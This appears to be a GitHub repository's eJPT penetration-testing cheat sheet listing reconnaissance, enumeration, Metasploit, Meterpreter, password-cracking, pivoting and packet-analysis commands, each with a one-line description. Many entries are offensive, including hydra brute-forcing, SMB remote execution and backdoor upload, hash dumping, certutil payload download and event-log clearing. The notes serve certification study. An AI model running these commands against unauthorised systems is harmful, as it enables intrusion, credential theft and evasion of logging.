Code-Manuel/ejpt-notes

⚔️ eJPT / Pentesting Notes Cheat Sheet (2026) ⚔️

exam preparation.

My Certification

---

Networking

Routing

Linux

ip route → Show the routing table and reachable networks.

Windows

route print → Display the Windows routing table.

Mac OS X / Linux

netstat -r → Show the kernel routing table.


IP Addresses

Linux

ip a → Show all network interfaces and IP addresses.
ip -br -c a → Show interfaces in brief colored format.

Windows

ipconfig /all → Display full network configuration.

Mac OS X / Linux

ifconfig → Show network interface information.


ARP

Linux

ip neighbour → Show ARP / neighbor table entries.

Windows

arp -a → Display the ARP cache.

Mac OS X / Linux

arp → Show ARP table entries.


Ports

Linux

netstat -tunp → Show active TCP/UDP connections with process info.
netstat -tulpn → Show listening TCP/UDP ports and processes.
ss -tnl → Show listening TCP ports using a modern alternative to netstat.

Windows

netstat -ano → Show active connections and listening ports with PID.

Mac OS X / Linux

netstat -p tcp -p udp → Show TCP and UDP connections.
lsof -n -i4TCP -i4UDP → List open IPv4 TCP and UDP sockets.


Connect and Scan

nc -v example.com 80 → Connect to a remote TCP port with verbose output.

openssl s_client -connect <HOST>:<PORT> → Connect to a TLS/SSL service and inspect the certificate.
openssl s_client -connect <HOST>:<PORT> -debug → Show detailed TLS debug output.
openssl s_client -connect <HOST>:<PORT> -state → Show TLS state transitions.
openssl s_client -connect <HOST>:<PORT> -quiet → Connect quietly to a TLS service.

nc -zv <HOST> <PORT> → Check whether a TCP port is open without sending data.


Information Gathering

Passive Recon

host <HOST> → Resolve a hostname to IP or DNS records.
whatweb <HOST> → Identify web technologies used by a target.
whois <HOST> → Retrieve domain registration details.
whois <IP> → Retrieve IP registration / ASN information.
dnsrecon -d <HOST> → Enumerate DNS records and perform DNS reconnaissance.

wafw00f -l → List supported WAF fingerprints.
wafw00f <HOST> -a → Detect whether a web application firewall is present.

sublist3r -d <HOST> → Discover subdomains using OSINT sources.
theHarvester -d <HOST> → Gather emails, subdomains, and hosts from public sources.
theHarvester -d <HOST> -b all → Query all supported OSINT sources.


Google Dorks

site: → Restrict results to a specific site.
inurl: → Search for a string inside the URL.
site:*.sitename.com → Search across subdomains.
intitle: → Search for a string in the page title.
filetype: → Search specific file extensions.
intitle:index of → Find directory listings.
cache: → Show cached page versions.
inurl:auth_user_file.txt → Look for exposed authentication files.
inurl:passwd.txt → Look for exposed password files.
inurl:wp-config.bak → Look for exposed WordPress backup config files.


DNS

sudo nano /etc/hosts → Edit local hostname resolution entries.
dnsenum <HOST> → Enumerate DNS records and subdomains.
dig <HOST> → Query DNS records for a host.
dig axfr @DNS-server-name <HOST> → Attempt a DNS zone transfer.
fierce --domain <HOST> → Perform DNS reconnaissance and subdomain discovery.


Host Discovery and Scanning

Ping / ARP Discovery

sudo nmap -sn <TARGET_IP/NETWORK> → Perform host discovery without port scanning.
netdiscover -i eth1 -r <TARGET_IP/NETWORK> → Discover live hosts with ARP requests.
sudo arp-scan -I eth1 <TARGET_IP/NETWORK> → Scan a local subnet using ARP.
ping <TARGET_IP> → Check whether a host is reachable.

Traceroute

tracert google.com → Trace the route to a host on Windows.
traceroute google.com → Trace the route to a host on Linux.

fping

fping -I eth1 -g <TARGET_IP/NETWORK> -a → Discover alive hosts in a subnet.
fping -I eth1 -g <TARGET_IP/NETWORK> -a 2>/dev/null → Discover alive hosts and suppress errors.


Nmap Scanning

nmap <TARGET_IP> → Scan common ports on a target.
nmap -Pn <TARGET_IP> → Skip host discovery and assume the target is alive.
nmap -sn <TARGET_IP>/<SUB> > hosts.txt → Perform host discovery and save results to a file.
nmap -sn -T4 <TARGET_IP>/<SUB> -oG - | awk '/Up$/{print $2}' → Extract alive hosts from grepable output.

nmap -p- <TARGET_IP> → Scan all 65535 TCP ports.
nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open → Scan all ports on multiple hosts and save results.

nmap -p 80 <TARGET_IP> → Scan port 80 only.
nmap -p 80,445,3389,8080 <TARGET_IP> → Scan a custom list of ports.
nmap -p1-2000 <TARGET_IP> → Scan a custom port range.

nmap -F <TARGET_IP> -v → Perform a fast scan with verbose output.
nmap -sU <TARGET_IP> → Scan UDP ports.
nmap -sV <TARGET_IP> → Detect service versions.
sudo nmap -sV -O <TARGET_IP> → Detect services and operating system.
nmap -sC <TARGET_IP> → Run default NSE scripts.
nmap -Pn -F -sV -O -sC <TARGET_IP> → Combine fast scan, service detection, OS detection, and scripts.
nmap -Pn -F -A <TARGET_IP> → Run aggressive scan.
nmap -Pn -F -T5 -sV -O -sC <TARGET_IP> -v → Use very fast timing with service and OS detection.

Output

nmap -Pn -F -oN outputfile.txt <TARGET_IP> → Save output in normal format.
nmap -Pn -F -oX outputfile.xml <TARGET_IP> → Save output in XML format.
nmap -Pn -sV -sC -O -oA outputfile <TARGET_IP> → Save output in all major formats.
nmap -A -oA outputfile <TARGET_IP> → Save aggressive scan output in all formats.


SMB Enumeration

Nmap

sudo nmap -p 445 -sV -sC -O <TARGET_IP> → Scan SMB with service, scripts, and OS detection.
nmap -p 445 --script smb-protocols <TARGET_IP> → Detect supported SMB protocol versions.
nmap -p 445 --script smb-security-mode <TARGET_IP> → Check SMB security mode settings.
nmap -p 445 --script smb-enum-sessions <TARGET_IP> → Enumerate active SMB sessions.
nmap -p 445 --script smb-enum-sessions --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate SMB sessions with credentials.

nmap -p 445 --script smb-enum-shares <TARGET_IP> → Enumerate SMB shares.
nmap -p 445 --script smb-enum-shares --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate shares with credentials.
nmap -p 445 --script smb-enum-users --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate SMB users with credentials.
nmap -p 445 --script smb-server-stats --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Retrieve SMB server stats.
nmap -p 445 --script smb-enum-domains --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate domains.
nmap -p 445 --script smb-enum-groups --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate groups.
nmap -p 445 --script smb-enum-services --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate services over SMB.
nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP> → Enumerate shares and list their contents.
nmap -p 445 --script smb-os-discovery <TARGET_IP> → Identify SMB host OS information.
nmap -p445 --script=smb-vuln-* <TARGET_IP> → Run SMB vulnerability detection scripts.


Other SMB Tools

nmblookup -A <TARGET_IP> → Query NetBIOS name information.

smbmap -u guest -p "" -d . -H <TARGET_IP> → Enumerate SMB shares as guest.
smbmap -u <USER> -p '<PW>' -d . -H <TARGET_IP> → Enumerate SMB shares with credentials.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig' → Execute a command remotely over SMB.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L → List all drives / shares.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$' → Recursively list a share or drive.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\sample_backdoor' → Upload a file to a writable SMB path.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt' → Download a remote file.


SMBClient

smbclient -L <TARGET_IP> -N → List shares using anonymous login.
smbclient -L <TARGET_IP> -U <USER> → List shares with credentials.
smbclient //<TARGET_IP>/<USER> -U <USER> → Connect to a user share.
smbclient //<TARGET_IP>/admin -U admin → Connect to the admin share.
smbclient //<TARGET_IP>/public -N → Connect to a public share anonymously.

Common SMBClient Commands

help → Show SMBClient help.
ls → List files in the current share.
get <filename> → Download a file from the share.


RPCClient

rpcclient -U "" -N <TARGET_IP> → Connect with a null session.

Common RPCClient Commands

enumdomusers → Enumerate domain users.
enumdomgroups → Enumerate domain groups.
lookupnames admin → Resolve account details for a given name.


Enum4linux

enum4linux -o <TARGET_IP> → Enumerate OS information.
enum4linux -U <TARGET_IP> → Enumerate users.
enum4linux -S <TARGET_IP> → Enumerate shares.
enum4linux -G <TARGET_IP> → Enumerate groups.
enum4linux -i <TARGET_IP> → Enumerate printer and share info.
enum4linux -r -u "<USER>" -p "<PW>" <TARGET_IP> → RID cycling with credentials.
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP> → Run all major checks with credentials.
enum4linux -U -M -S -P -G <TARGET_IP> → Enumerate users, machines, shares, policies, and groups.

Null Session Checks

enum4linux -n <TARGET_IP> → Check whether the target may allow a null session.
enum4linux <TARGET_IP> → Run further enumeration if null session is suspected.
smbclient -L WORKGROUP -I <TARGET_IP> -N -U "" → List shares using a null session.
smbclient \\\\<TARGET_IP>\\c$ -N -U "" → Attempt anonymous connection to a share.
smb: \> get file_shared.txt → Download a file from the share.


Hydra SMB

gzip -d /usr/share/wordlists/rockyou.txt.gz → Uncompress the RockYou wordlist.
hydra -l admin -P /usr/share/wordlists/rockyou.txt <TARGET_IP> smb → Attempt SMB password guessing for a single user.


Metasploit SMB

msfconsole → Start Metasploit.
msfconsole -q → Start Metasploit quietly.

use auxiliary/scanner/smb/smb_version → Detect SMB version.
use auxiliary/scanner/smb/smb_enumusers → Enumerate SMB users.
use auxiliary/scanner/smb/smb_enumshares → Enumerate SMB shares.
use auxiliary/scanner/smb/smb_login → Test SMB credentials.
use auxiliary/scanner/smb/pipe_auditor → Enumerate accessible named pipes.

set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt → Set a password file.
set SMBUser <USER> → Set the SMB username.
set RHOSTS <TARGET_IP> → Set target host(s).
exploit → Run the selected module.


FTP Enumeration

Nmap

sudo nmap -p 21 -sV -sC -O <TARGET_IP> → Scan FTP with version detection and default scripts.
nmap -p 21 -sV -O <TARGET_IP> → Scan FTP and identify OS.

nmap -p 21 --script ftp-anon <TARGET_IP> → Check whether anonymous login is allowed.
nmap -p 21 --script ftp-brute --script-args userdb=<USERS_LIST> <TARGET_IP> → Attempt FTP credential guessing.


FTP Client

ftp <TARGET_IP> → Connect to an FTP server.
ls → List files in the current FTP directory.
cd /../.. → Move across directories.
get <filename> → Download a file.
put <filename> → Upload a file.


Hydra FTP

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> -t 4 ftp → Attempt FTP credential guessing with multiple users and passwords.


SSH Enumeration

Nmap

sudo nmap -p 22 -sV -sC -O <TARGET_IP> → Scan SSH with default scripts and OS detection.
nmap -p 22 --script ssh2-enum-algos <TARGET_IP> → Enumerate supported SSH algorithms.
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full <TARGET_IP> → Retrieve host key details.
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=<USER>" <TARGET_IP> → Enumerate supported auth methods for a user.
nmap -p 22 --script=ssh-brute --script-args userdb=<USERS_LIST> <TARGET_IP> → Attempt SSH password guessing.


Netcat

nc <TARGET_IP> <TARGET_PORT> → Connect to a TCP port manually.
nc <TARGET_IP> 22 → Connect to the SSH port manually.


SSH Client

ssh -p 22 <USER>@<TARGET_IP> → Connect to SSH as a specific user (the port is given with -p; a bare trailing "22" would be run as a remote command).
ssh -p 22 root@<TARGET_IP> → Connect as root if root login is allowed.


Hydra SSH

hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <TARGET_IP> ssh → Attempt SSH password guessing for one user.


Metasploit SSH

use auxiliary/scanner/ssh/ssh_login → Test SSH logins.
set RHOSTS <TARGET_IP> → Set target host(s).
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt → Set combined user/password list.
set STOP_ON_SUCCESS true → Stop after the first successful login.
set VERBOSE true → Enable verbose output.
exploit → Run the module.


HTTP Enumeration

Nmap

sudo nmap -p 80 -sV -O <TARGET_IP> → Scan HTTP and detect OS.
nmap -p 80 --script=http-enum -sV <TARGET_IP> → Enumerate common web paths.
nmap -p 80 --script=http-headers -sV <TARGET_IP> → Retrieve HTTP headers.
nmap -p 80 --script=http-methods --script-args http-methods.url-path=/webdav/ <TARGET_IP> → Check enabled HTTP methods for a path.
nmap -p 80 --script=http-webdav-scan --script-args http-webdav-scan.path=/webdav/ <TARGET_IP> → Check for WebDAV exposure (this script takes its path via http-webdav-scan.path, not http-methods.url-path).


Alternative HTTP Enumeration

whatweb <TARGET_IP> → Identify web technologies.
http <TARGET_IP> → Send an HTTP request using HTTPie.
browsh --startup-url http://<TARGET_IP> → Open a site in a terminal browser.

dirb http://<TARGET_IP> → Discover hidden directories and files.
dirb http://<TARGET_IP> /usr/share/metasploit-framework/data/wordlists/directory.txt → Run DIRB with a custom wordlist.

wget <TARGET_IP> → Download web content.
curl <TARGET_IP> | more → Fetch and page through response content.
curl -I http://<TARGET_IP>/<DIR> → Show only response headers.
curl --digest -u <USER>:<PW> http://<TARGET_IP>/<DIR> → Send an HTTP Digest Auth request.

lynx <TARGET_IP> → Browse a site from the terminal.


Hydra HTTP

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ → Attempt HTTP Basic Auth password guessing.
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ → Attempt HTTP Basic Auth password guessing using GET requests (hydra's http-get module uses Basic Auth unless another mechanism is selected with its A= option).
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" → Attempt HTTP form password guessing.
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" → Attempt password guessing on an authenticated form flow.


Metasploit HTTP

use auxiliary/scanner/http/brute_dirs → Brute-force directories.
use auxiliary/scanner/http/robots_txt → Retrieve robots.txt entries.
use auxiliary/scanner/http/http_header → Inspect HTTP headers.
use auxiliary/scanner/http/http_login → Test HTTP logins.
use auxiliary/scanner/http/http_version → Retrieve HTTP server version.

setg RHOSTS <TARGET_IP> → Set global target hosts.
setg RHOST <TARGET_IP> → Set global single target host.

set HTTP_METHOD GET → Set the HTTP method.
set TARGETURI /<DIR>/ → Set target URI path.
set USER_FILE <USERS_LIST> → Set user wordlist.
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt → Set password wordlist.
set VERBOSE false → Disable verbose output.
set AUTH_URI /<DIR>/ → Set auth URI.
exploit → Run the module.


SQL Enumeration

MySQL Nmap

sudo nmap -p 3306 -sV -O <TARGET_IP> → Scan MySQL and detect OS.
nmap -p 3306 --script=mysql-empty-password <TARGET_IP> → Check for empty MySQL passwords.
nmap -p 3306 --script=mysql-info <TARGET_IP> → Retrieve MySQL version and status info.
nmap -p 3306 --script=mysql-users --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP> → Enumerate MySQL users.
nmap -p 3306 --script=mysql-databases --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP> → Enumerate databases.
nmap -p 3306 --script=mysql-variables --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP> → Retrieve MySQL server variables.
nmap -p 3306 --script=mysql-dump-hashes --script-args="username='<USER>',password='<PW>'" <TARGET_IP> → Dump MySQL password hashes.
nmap -p 3306 --script=mysql-query --script-args="query='select count(*) from <DB_NAME>.<TABLE_NAME>;',username='<USER>',password='<PW>'" <TARGET_IP> → Execute a SQL query.


MSSQL Nmap

nmap -sV -sC -p 1433 <TARGET_IP> → Scan MSSQL with version detection and default scripts.
nmap -p 1433 --script ms-sql-info <TARGET_IP> → Retrieve MSSQL instance information.
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 <TARGET_IP> → Enumerate NTLM info from MSSQL.
nmap -p 1433 --script ms-sql-empty-password <TARGET_IP> → Check for empty MSSQL passwords.


MySQL Client

mysql -h <TARGET_IP> -u <USER> → Connect to MySQL as a given user.
mysql -h <TARGET_IP> -u root → Connect as root.

Common MySQL Commands

help → Show MySQL client help.
show databases; → List databases.
use <DB_NAME>; → Select a database.
select count(*) from <TABLE_NAME>; → Count table rows.
select load_file("/etc/shadow"); → Try reading a file via MySQL if permissions allow.


Hydra MySQL

hydra -l <USER> -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> mysql → Attempt MySQL password guessing.


Metasploit MySQL / MSSQL

use auxiliary/scanner/mysql/mysql_schemadump → Dump MySQL schema info.
use auxiliary/scanner/mysql/mysql_writable_dirs → Find writable directories.
use auxiliary/scanner/mysql/mysql_file_enum → Enumerate accessible files.
use auxiliary/scanner/mysql/mysql_hashdump → Dump MySQL hashes.
use auxiliary/scanner/mysql/mysql_login → Test MySQL credentials.

use auxiliary/scanner/mssql/mssql_login → Test MSSQL credentials.
use auxiliary/admin/mssql/mssql_enum → Enumerate MSSQL server info.
use auxiliary/admin/mssql/mssql_enum_sql_logins → Enumerate SQL logins.
use auxiliary/admin/mssql/mssql_exec → Execute commands via MSSQL when possible.
use auxiliary/admin/mssql/mssql_enum_domain_accounts → Enumerate domain accounts from MSSQL.


SMTP Enumeration

Nmap / Manual

sudo nmap -p 25 -sV -sC -O <TARGET_IP> → Scan SMTP service.
nmap -sV --script banner <TARGET_IP> → Grab service banners.
nc <TARGET_IP> 25 → Connect manually to SMTP.
telnet <TARGET_IP> 25 → Connect manually to SMTP.

SMTP Commands

HELO attacker.xyz → Initiate SMTP session.
EHLO attacker.xyz → Request extended SMTP capabilities.

smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t <TARGET_IP> → Enumerate valid SMTP users.


Metasploit SMTP

service postgresql start && msfconsole -q → Start PostgreSQL and Metasploit quietly.
setg RHOSTS <TARGET_IP> → Set global target hosts.
setg RHOST <TARGET_IP> → Set global target host.
use auxiliary/scanner/smtp/smtp_enum → Enumerate SMTP users or server behavior.


Vulnerability Assessment

nmap -sV --script ssl-enum-ciphers -p <SECURED_PORT> <TARGET> → Enumerate SSL/TLS ciphers.
nmap -sV --script ssl-heartbleed -p 443 <TARGET_IP> → Check for Heartbleed.

nmap --script smb-vuln-ms17-010 -p 445 <TARGET_IP> → Check for MS17-010.
msfconsole → Start Metasploit.
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce → Load the BlueKeep module.

nmap --script log4shell.nse --script-args log4shell.callback-server=<CALLBACK_SERVER_IP>:1389 -p 8080 <TARGET_IP> → Probe for Log4Shell behavior in a controlled environment.
searchsploit badblue 2.7 → Search Exploit-DB for BadBlue 2.7 related entries.


Metasploit Basics

service postgresql start && msfconsole -q → Start Metasploit with database support.

General Commands

db_status → Check database connection status.
help → Show help.
version → Show Metasploit version.
show -h → Show available show options.
show all → Show all module categories.
show exploits → List exploit modules.
show payloads → List payloads.

search <STRING> → Search modules by keyword.
search cve:2017 type:exploit platform:windows → Search exploit modules by CVE, type, and platform.
use <MODULE_NAME> → Select a module.
show options → Show module options.
set <OPTION> <VALUE> → Set a module option.
run → Execute the module.
execute → Alias for run.
exploit → Execute the module.


Sessions

sessions → List active sessions.
sessions 1 → Interact with session 1.
sessions -n xoda -i 1 → Rename session 1.
sessions -C sysinfo -i 1 → Run a Meterpreter command against a session.
sessions -k 1 → Kill session 1.
sessions -K → Kill all sessions.
sessions -u 1 → Upgrade a shell to Meterpreter when supported.


Workspaces

workspace → List workspaces.
workspace -a <NEW_WORKSPACE> → Add a new workspace.
workspace <WORKSPACE_NAME> → Switch to a workspace.
workspace -d <WORKSPACE_NAME> → Delete a workspace.


Database Import / Recon

db_import <XML_FILE_NAME> → Import Nmap XML results.
hosts → List hosts in the database.
services → List services.
vulns → List vulnerabilities.
loot → Show collected loot.
creds → Show collected credentials.
notes → Show notes.

db_nmap -Pn -sV -O <TARGET_IP> → Run Nmap from inside Metasploit and import results automatically.


Meterpreter

background → Send current Meterpreter session to background.
cat → Read a file.
cd → Change directory.
checksum md5 /bin/bash → Calculate an MD5 checksum.
clearev → Clear Windows event logs.
download Filename /root/... → Download a file from target to attacker.
edit → Edit a file.
execute -f ifconfig → Run a program on the target.
getenv → Show environment variables.
getenv PATH → Show PATH environment variable.
getuid → Show current user context.
hashdump → Dump password hashes where supported.
idletime → Show user idle time.
ifconfig → Show network interfaces on target.
lpwd → Show local working directory.
ls → List files.
migrate → Move Meterpreter into another process.
mkdir → Create a directory.
ps → Show running processes.
pwd → Show current directory.
resource <file.txt> → Run commands from a resource file.
rmdir → Remove a directory.
search -f *.txt → Search for files.
shell → Drop into a system shell.
sysinfo → Show target system information.
upload /path/file.exe C://Windows → Upload a file to the target.


Windows Enumeration

Basic Windows Commands

systeminfo → Show OS and system details.
hostname → Show the computer name.
wmic qfe get Caption,Description,HotFixID,InstalledOn → List installed patches.

Users

whoami → Show current user.
whoami /priv → Show current privileges.
query user → Show logged-in users.
net users → List local users.
net user <USER> → Show details for a user.
net localgroup → List local groups.
net localgroup Administrators → List local admins.
net localgroup "Remote Desktop Users" → List RDP users.

Network

ipconfig → Show IP config.
ipconfig /all → Show detailed network config.
route print → Show routing table.
arp -a → Show ARP cache.
netstat -ano → Show connections and PIDs.
netsh firewall show state → Show firewall state.
netsh advfirewall show allprofiles → Show all firewall profile settings.

Services / Tasks

net start → Show started services.
wmic service list brief → List services briefly.
tasklist /SVC → Show running tasks and services.
schtasks /query /fo LIST → List scheduled tasks.
schtasks /query /fo LIST /v → List tasks verbosely.
fsutil fsinfo drives → List drives.


Linux Enumeration

Basic Linux Commands

whoami → Show current user.
cat /etc/*release → Show Linux distribution info.
uname -a → Show kernel and architecture.
uname -r → Show kernel version.
cat /etc/passwd → Show local users and service accounts.
find / -name "flag" → Search for a file named flag.

System

hostname → Show hostname.
cat /etc/*issue → Show banner / distribution info.
dpkg -l → List installed packages on Debian-based systems.
env → Show environment variables.
lscpu → Show CPU info.
free -h → Show memory usage.
df -h → Show disk usage.
lsblk -l → Show block devices.
lsblk | grep sd → Show block devices matching sd.

Users

ls -lah /home → List user home directories.
cat /etc/passwd | grep -v /nologin → Show interactive users.
groups <USER> → Show groups for a user.
groups root → Show root's groups.
groups → Show current user groups.
who → Show logged-in users.
w → Show logged-in users and activity.
last → Show login history.
lastlog → Show last login for all users.

Network

ifconfig → Show interfaces.
ip -br -c a → Show interfaces in brief format.
ip a → Show interfaces and addresses.
cat /etc/networks → Show network names database.
cat /etc/hostname → Show hostname file.
cat /etc/hosts → Show local host mappings.
cat /etc/resolv.conf → Show DNS resolver config.
arp -a → Show ARP entries.

Processes / Services

ps → Show running processes.
ps aux → Show detailed process list.
ps aux | grep root → Search for root-owned processes.
top → Show interactive process list.
cat /etc/cron* → Show cron-related files.
crontab -l → List user cron jobs.
netstat -antp → Show network connections with processes.
ss -tnl → Show listening TCP sockets.


File Transfer

Python Web Server

python -V → Show Python version.
python3 -V → Show Python 3 version.
py -V → Show the Python version selected by the Windows launcher.

python -m SimpleHTTPServer <PORT_NUMBER> → Start a Python 2 HTTP server.
python3 -m http.server <PORT_NUMBER> → Start a Python 3 HTTP server.
python -m http.server <PORT> → Start a simple HTTP server if supported.
py -3 -m http.server <PORT> → Start a Python 3 HTTP server on Windows.


Other Transfer Methods

certutil -urlcache -f http://<TARGET_IP>/payload.exe payload.exe → Download a file on Windows using certutil.
scp <USER>@<TARGET_IP>:~/.ssh/id_rsa . → Copy a remote file locally via SCP.


Shells and TTY

Basic Shells

/bin/bash -i → Spawn an interactive Bash shell.
/bin/sh -i → Spawn an interactive sh shell.


TTY Upgrade

python -c 'import pty; pty.spawn("/bin/bash")' → Upgrade a shell using Python PTY.
python3 -c 'import pty; pty.spawn("/bin/bash")' → Upgrade a shell with Python 3.

stty raw -echo && fg → Fix terminal behavior after backgrounding a shell.
reset → Reset terminal state.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin → Set a useful PATH.
export TERM=xterm → Set terminal type.
export SHELL=/bin/bash → Set default shell.
stty rows 36 columns 157 → Match terminal dimensions.

SHELL=/bin/bash script -q /dev/null → Spawn a more stable interactive shell.
perl -e 'exec "/bin/bash";' → Spawn Bash via Perl.


Password Cracking

John the Ripper

john --list=formats | grep NT → Show NT-compatible formats.
john --format=NT hashes.txt → Crack NT hashes.
john <Hash_File> --wordlist=/usr/share/wordlists/rockyou.txt → Crack hashes with RockYou.
john --format=NT win_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt → Crack Windows NT hashes.

unshadow passwd shadow > unshadowed.txt → Combine passwd and shadow files for cracking.
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt → Crack combined Linux credentials.


Hashcat

hashcat -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt → Attempt cracking NT hashes with a wordlist (-a 0 is the straight/dictionary attack; -a 3 is a mask attack and would treat the wordlist path as a mask).
hashcat -a 0 -m 1000 --show hashes.txt /usr/share/wordlists/rockyou.txt → Show already cracked results from the potfile.
hashcat --help | grep 1800 → Find the SHA-512 crypt (sha512crypt) hash mode.
hashcat -a 0 -m 1800 linux.hashes.txt /usr/share/wordlists/rockyou.txt → Attempt cracking Linux SHA-512 crypt hashes with a wordlist.


Pivoting

Route Checks

ip route → Show routes on Linux.
route → Show routes on Linux using legacy tool.
route print → Show routes on Windows.


Manual Route Add

ip route add <subnet> via <gateway> → Add a route to an internal subnet through a pivot host.
ip route add 192.168.222.0/24 via 10.172.24.1 → Example manual route addition.


Meterpreter Pivoting

run autoroute -s <TARGET1_SUBNET_NETWORK> → Add a route through the compromised host.
run autoroute -p → Show active Meterpreter routes.
run arp_scanner -r <TARGET1_SUBNET_NETWORK> → ARP scan through the pivot host.

use auxiliary/scanner/portscan/tcp → Load TCP port scanner.
set RHOSTS <TARGET2_IP> → Set internal target.
set PORTS 1-100 → Set ports to scan.
run → Start the scan.

Port Forwarding

portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <TARGET_IP> → Forward a local port to a remote internal service.
db_nmap -sS -sV -p <LOCAL_PORT> localhost → Scan a forwarded service from localhost.


Wireshark and TShark

Wireshark

wireshark -i eth1 → Start Wireshark on interface eth1.

Useful Filters

ip.addr == 10.10.10.9 → Filter packets by IP.
ip.dst == 10.10.10.15 → Filter by destination IP (the field is ip.dst; ip.dest is not a valid Wireshark field).
ip.src == 10.10.16.33 → Filter by source IP.
tcp.port == 25 → Filter by TCP port.
ip.addr == 10.10.14.22 and tcp.port == 8080 → Filter by IP and TCP port.
tcp.flags.syn == 1 and tcp.flags.ack == 0 → Filter SYN packets.
eth.dst == ff:ff:ff:ff:ff:ff → Filter Ethernet broadcast packets.


TShark

tshark -D → List available capture interfaces.
tshark -i eth1 → Capture traffic on eth1.
tshark -r <FILE>.pcap → Read packets from a pcap file.
tshark -r <FILE>.pcap | wc -l → Count packets in a pcap.
tshark -r <FILE>.pcap -c 100 → Show the first 100 packets.
tshark -r <FILE>.pcap -z io,phs -q → Show protocol hierarchy statistics.

HTTP Analysis

tshark -r <FILE>.pcap -Y 'http' | more → Show HTTP traffic.
tshark -r <FILE>.pcap -Y "http.request.method==GET" → Show only GET requests.
tshark -r <FILE>.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri → Extract time, source IP, and full URI for GET requests.
tshark -r <FILE>.pcap -Y "http contains password" → Search for HTTP packets containing the string "password".
tshark -r <FILE>.pcap -Y "http.request.method==GET && http.host==<TARGET_URL>" -Tfields -e ip.dst → Extract destination IP for GET requests to a target host.
tshark -r <FILE>.pcap -Y "ip.src==<IP> && http" -Tfields -e http.user_agent → Show user agents from a source IP.

Wi-Fi Analysis

tshark -r <FILE>.pcap -Y "wlan" → Show Wi-Fi traffic.
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==0x000c" → Show deauthentication frames.
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra → Extract receiver MACs from deauth frames.
tshark -r <FILE>.pcap -Y "eapol" → Show WPA handshake packets.
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid → Extract SSID and BSSID from beacon frames.
tshark -r <FILE>.pcap -Y "wlan.ssid==<SSID>" -Tfields -e wlan.bssid → Find BSSID for a given SSID.
tshark -r <FILE>.pcap -Y "wlan.ssid==<SSID>" -Tfields -e wlan_radio.channel → Show the Wi-Fi channel for an SSID.


Web Application Testing

Tooling

dirb http://<TARGET_IP> → Brute-force web directories.
curl -I <TARGET_IP> → Show HTTP headers.
curl -X GET <TARGET_IP> → Send a GET request.
curl -X OPTIONS <TARGET_IP> -v → Show supported methods and response details.
curl -X POST <TARGET_IP> → Send a POST request.
curl -X POST <TARGET_IP>/login.php -d "name=john&password=password" -v → Send login data in a POST request.
curl -X PUT <TARGET_IP> → Send a PUT request.
curl <TARGET_IP>/uploads/ --upload-file hello.txt → Upload a file if PUT is allowed.
curl -X DELETE <TARGET_IP>/uploads/hello.txt -v → Attempt file deletion if DELETE is allowed.

Gobuster

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404 → Discover directories while ignoring common negative status codes.
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r → Discover files with extensions and follow redirects.
gobuster dir -u http://<TARGET_IP>/data -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r → Enumerate files and directories under a specific path, following redirects.

FFUF

ffuf -w wordlist.txt -u http://example.com/FUZZ → Discover directories or endpoints.
ffuf -w wordlist.txt -u http://example.com/FUZZ -e .aspx,.php,.txt,.html → Discover files by extension.
